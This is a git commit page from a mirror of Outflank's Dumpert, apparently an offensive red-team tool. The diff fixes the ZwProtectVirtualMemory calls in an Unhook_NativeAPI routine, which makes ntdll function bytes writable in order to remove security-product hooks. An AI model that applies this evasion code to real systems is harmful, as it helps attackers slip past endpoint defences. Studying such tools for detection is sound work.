Mirrors/outflanknl-dumpert
1
0
Fork 0
mirror of https://github.com/outflanknl/Dumpert.git synced 2026-06-08 16:37:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

ZwProtectVirtualMemory Bugfix

Browse Source
This commit is contained in:
Cn33liz
2019-07-05 22:33:39 +02:00
parent b895173983
commit 3add4d10af
3 changed files with 6 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Dumpert-Aggressor/Outflank-Dumpert.bin
BIN
View File
Binary file not shown.
Dumpert-DLL/Outflank-Dumpert-DLL/Dumpert.c
+3 -2
View File
@@ -40,9 +40,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall); LPVOID lpProcAddress = GetProcAddress(LoadLibrary(L"ntdll.dll"), pWinVerInfo->lpApiCall);
LPVOID lpBaseAddress = lpProcAddress;
ULONG OldProtection, NewProtection; ULONG OldProtection, NewProtection;
SIZE_T uSize = 10; SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) { if (status != STATUS_SUCCESS) {
return FALSE; return FALSE;
} }
@@ -52,7 +53,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
return FALSE; return FALSE;
} }
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) { if (status != STATUS_SUCCESS) {
return FALSE; return FALSE;
} }
Dumpert/Outflank-Dumpert/Dumpert.c
+3 -2
View File
@@ -44,9 +44,10 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]); printf(" [+] %s System call nr is: 0x%x\n", pWinVerInfo->lpApiCall, AssemblyBytes[4]);
printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall); printf(" [+] Unhooking %s.\n", pWinVerInfo->lpApiCall);
LPVOID lpBaseAddress = lpProcAddress;
ULONG OldProtection, NewProtection; ULONG OldProtection, NewProtection;
SIZE_T uSize = 10; SIZE_T uSize = 10;
NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection); NTSTATUS status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, PAGE_EXECUTE_READWRITE, &OldProtection);
if (status != STATUS_SUCCESS) { if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE; return FALSE;
@@ -58,7 +59,7 @@ BOOL Unhook_NativeAPI(IN PWIN_VER_INFO pWinVerInfo) {
return FALSE; return FALSE;
} }
status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpProcAddress, &uSize, OldProtection, &NewProtection); status = ZwProtectVirtualMemory(GetCurrentProcess(), &lpBaseAddress, &uSize, OldProtection, &NewProtection);
if (status != STATUS_SUCCESS) { if (status != STATUS_SUCCESS) {
wprintf(L" [!] ZwProtectVirtualMemory failed.\n"); wprintf(L" [!] ZwProtectVirtualMemory failed.\n");
return FALSE; return FALSE;